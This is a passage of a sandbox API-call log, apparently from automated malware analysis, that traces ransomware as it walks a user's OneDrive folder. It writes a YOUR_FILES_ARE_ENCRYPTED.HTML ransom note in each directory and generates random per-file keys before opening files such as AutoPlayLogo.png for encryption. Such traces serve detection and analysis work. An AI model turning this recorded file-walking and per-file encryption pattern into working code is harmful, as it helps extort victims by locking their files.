param_1=0x4ebce72, param_2="%02X" | out: param_1="10") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce76, param_2="%02X" | out: param_1="1D") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce7a, param_2="%02X" | out: param_1="08") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce7e, param_2="%02X" | out: param_1="87") returned 2 [0160.001] wsprintfW (in: param_1=0x4ebce82, param_2="%02X" | out: param_1="0B") returned 2 [0160.002] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" [0160.002] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.002] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0160.002] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa600a1d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa600a1d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa600a1d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0xca5c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="msvcr110.dll", cAlternateFileName="")) returned 0 [0160.002] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.003] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.003] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.005] CloseHandle (hObject=0x5a8) returned 1 [0160.006] GetProcessHeap () returned 0x270000 [0160.007] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.007] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6030330, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa61d3250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa61d3250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ar", cAlternateFileName="")) returned 1 [0160.007] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar") returned 74 [0160.007] GetProcessHeap () returned 0x270000 [0160.007] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.007] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar" [0160.007] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar\\*" [0160.007] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6030330, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa61d3250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa61d3250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.008] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6030330, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa61d3250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa61d3250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0160.008] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa61d3250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa61d3250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa61d3250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x110a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.008] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar\\FileSync.LocalizedResources.dll.mui") returned 110 [0160.008] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.008] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.008] lstrlenW (lpString=".mui") returned 4 [0160.008] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.008] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa61d3250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa61d3250, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa61d3250, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x110a8, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.008] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.008] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0160.008] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.009] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.011] CloseHandle (hObject=0x5a8) returned 1 [0160.011] GetProcessHeap () returned 0x270000 [0160.012] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.012] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa61d3250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa639c2d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa639c2d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="as-in", cAlternateFileName="")) returned 1 [0160.012] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in") returned 77 [0160.012] GetProcessHeap () returned 0x270000 [0160.012] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0160.012] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in" [0160.012] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in\\*" [0160.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa61d3250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa639c2d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa639c2d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0160.013] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa61d3250, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa639c2d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa639c2d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0160.013] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa639c2d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa639c2d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa639c2d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0160.013] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in\\FileSync.LocalizedResources.dll.mui") returned 113 [0160.013] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.013] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.013] lstrlenW (lpString=".mui") returned 4 [0160.013] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0160.013] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa639c2d0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa639c2d0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa639c2d0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12eb0, dwReserved0=0x0, dwReserved1=0x60, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0160.013] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0160.013] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0160.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\as-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\as-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a8 [0160.014] WriteFile (in: hFile=0x5a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0160.016] CloseHandle (hObject=0x5a8) returned 1 [0160.016] GetProcessHeap () returned 0x270000 [0160.017] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0160.017] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3e449b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3e449b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3e449b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x123c, dwReserved0=0x0, dwReserved1=0x60, cFileName="AutoPlayLogo.png", cAlternateFileName="AUTOPL~1.PNG")) returned 1 [0160.017] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png") returned 88 [0160.017] lstrcmpW (lpString1="AutoPlayLogo.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.017] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0160.017] lstrlenW (lpString=".png") returned 4 [0160.017] PathFindExtensionW (pszPath="AutoPlayLogo.png") returned=".png" [0160.017] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.017] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\autoplaylogo.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a8 [0160.018] GetFileSizeEx (in: hFile=0x5a8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=4668) returned 1 [0160.018] GetProcessHeap () returned 0x270000 [0160.018] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0160.025] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="A6") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="48") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="CF") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="E9") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="9E") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="E6") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="11") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="3C") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="3F") returned 2 [0160.025] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="94") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="A3") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="41") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="F4") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="5D") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="02") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="5E") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="24") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="9C") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="D7") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="31") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="C3") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="19") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="E3") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="ED") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="A7") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="7F") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="44") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="CC") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="24") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="51") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="E5") returned 2 [0160.026] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="35") returned 2 [0160.027] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayLogo.png" [0160.027] CreateIoCompletionPort (FileHandle=0x5a8, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.027] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0160.027] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa3e6ab10, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa3e6ab10, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa3e6ab10, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x5d8f6, dwReserved0=0x0, dwReserved1=0x60, cFileName="AutoPlayOptIn.gif", cAlternateFileName="AUTOPL~1.GIF")) returned 1 [0160.027] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif") returned 89 [0160.027] lstrcmpW (lpString1="AutoPlayOptIn.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0160.027] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0160.027] lstrlenW (lpString=".gif") returned 4 [0160.028] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0160.028] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0160.028] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\autoplayoptin.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5ac [0160.028] GetFileSizeEx (in: hFile=0x5ac, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=383222) returned 1 [0160.028] GetProcessHeap () returned 0x270000 [0160.028] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0160.030] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="0F") returned 2 [0160.030] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="35") returned 2 [0160.030] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="43") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="C7") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="72") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="EC") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="EC") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="BA") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="D7") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="98") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="66") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="3A") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="16") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="AD") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="33") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="91") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="CC") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="A8") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="A0") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="65") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="34") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="3F") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="B7") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="B3") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="52") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="50") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="59") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="9D") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="EB") returned 2 [0160.031] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="80") returned 2 [0160.032] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="E3") returned 2 [0160.032] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="50") returned 2 [0160.032] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\AutoPlayOptIn.gif" [0160.032] CreateIoCompletionPort (FileHandle=0x5ac, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0160.032] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, 